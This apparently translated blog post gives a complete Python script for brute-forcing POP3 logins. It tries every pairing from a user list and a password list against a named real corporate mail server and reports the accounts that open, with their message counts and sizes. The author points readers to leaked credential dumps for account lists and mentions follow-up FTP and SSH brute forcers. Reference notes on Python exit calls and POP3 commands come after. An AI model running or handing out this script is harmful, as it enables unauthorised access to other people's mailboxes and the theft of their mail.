According to the task given by the master, I wrote a blasting script for corporate mailboxes, followed by some blasting scripts such as FTP and SSH.
Let me talk about the overall idea first:
The overall idea is to use python's poplib module to interact from the pop3 server and generate results based on the relevant information obtained. The POP3 protocol is not complicated. It also adopts a question-and-answer method. If you send a command to the server, the server will definitely reply with a message.
1. First verify whether the parameters are correct
Sys.argv[] is used to obtain command line parameters. sys.argv[0] represents the file path of the code itself, so the parameters start from 1
2. Then read from the user password file Get information
3.pop.getwelcome() is used to get the response status of the connection server
4.Then comes the core code part of the script
server = "pop.qiye.163.com" //设置pop3服务器地址 pop = poplib.POP3(server,110) //连接pop3服务器 pop.user(user) //验证用户名 auth = pop.pass_(passwd) //验证密码 if auth.split(' ')[0]== "+OK": //判断响应的结果是否“OK” pring user,passwd
5.Finally output the relevant user information
The script code is as follows:
#!/usr/bin/python # -*- coding: UTF-8 -*- ''' @Author:joy_nick @博客:http://byd.dropsec.xyz/ @Email Pop3 Brute Forcer ''' import threading, time, random, sys, poplib from copy import copy if len(sys.argv) !=3: print "\t --------------------------------------------------\n" print "\t Usage: ./Emailpopbrute.py <userlist> <passlist>\n" sys.exit(1) server = "pop.qiye.163.com" success = [] try: users = open(sys.argv[1], "r").readlines() except(IOError): print "[-] Error: urerlist打开失败!\n" sys.exit(1) try: words = open(sys.argv[2], "r").readlines() except(IOError): print "[-] Error: passlist打开失败!\n" sys.exit(1) try: pop = poplib.POP3(server,110) welcome = pop.getwelcome() print welcome pop.quit() except (poplib.error_proto): welcome = "No Response" pass def mailbruteforce(listuser,listpwd): if len(listuser) < 1 or len(listpwd) < 1 : print "An error occurred: No user or pass list" return 1 for user in listuser: for value in listpwd : user = user.replace("\n","") value = value.replace("\n","") try: print "-"*12 print "[+] User:",user,"Password:",value time.sleep(1) pop = poplib.POP3(server,110) pop.user(user) auth = pop.pass_(value) print auth if auth.split(' ')[0]!= "+OK" : pop.quit() print "unknown error !" continue if pop.stat()[1] is None or pop.stat()[1] < 1 : pop.quit() print "获取信息失败!" continue ret = (user,value,pop.stat()[0],pop.stat()[1]) success.append(ret) pop.quit() break except: #print "An error occurred:", msg pass print "\t --------------------------------------------------\n" print "[+] Server:",server print "[+] Port: 995" print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words) print "[+] Server response:",welcome,"\n" mailbruteforce(users,words) print "\t[+] have weakpass :\t",len(success) if len(success) >=1: for ret in success: print "\n\n[+] Login successful:",ret[0], ret[1] print "\t[+] Mail:",ret[2],"emails" print "\t[+] Size:",ret[3],"bytes\n" print "\n[-] Done"
Test results:
Description:
The user dictionary file requires @domain.com, Similar to zhangsan@domain.com, lisi@domain.com, wangwu@domain.com. Since I don’t have a corporate email account and password, I didn’t test it successfully. If you are interested, you can search for relevant social work pants.
Attachment:
What is the difference between os._exit(), sys.exit(), and exit() in python?
sys.exit(n) Exiting the program triggers a SystemExit exception, which can be caught to perform some cleanup work. The default value of n is 0, indicating a normal exit. Others are abnormal exits. If this exception is not caught, it will be directly Exit; catching this exception can do some additional cleanup work. Generally, this exit
os._exit(n) is used in the main program to exit the Python interpreter directly. The subsequent code will not be executed, no exception will be thrown, and no related cleanup work will be performed. It is often used for the exit of child processes. .
exit() should be the same as exit() in other languages such as C language
The process of receiving emails in pop3 is generally:
Connect to the pop3 server (poplib.POP3.__init__)
Send user name and password for verification (poplib.POP3.user poplib.POP3.pass_)
Get the message information in the mailbox (poplib.POP3.stat)
Receive mail(poplib.POP3.retr)
Delete mail(poplib.POP3.dele)
Exit(poplib.POP3.quit)
Command poplib method parameter status description
------------------------------------------ -------------------------------------------------- ------
USER user username approves the user name. If this command and the following pass command are successful, it will cause state transition
PASS pass_ password approves the user password
APOP apop Name,Digest approves the Digest is MD5 message summary
-------------------------------------------------- -------------------------------------------------- -
STAT stat None Processes the request server to send back statistics about the mailbox, such as the total number of emails and the total number of bytes
UIDL uidl [Msg#] Processes the unique identifier of the returned email, each identifier of the POP3 session will be unique
LIST list [Msg#] Process returns the number of messages and the size of each message
RETR retr [Msg#] Processes returns the full text of the message identified by the parameter
DELE dele [Msg #] The processing server will mark the messages identified by the parameter as deleted, executed by the quit command
RSET rset None The processing server will reset all messages marked for deletion, used to undo the DELE command
TOP top [Msg#] processing The server will return the first n lines of the email identified by the parameter, n must be a positive integer
NOOP noop None The processing server returns a positive response
For more related articles about python making corporate mailbox blasting scripts, please pay attention to PHP Chinese website!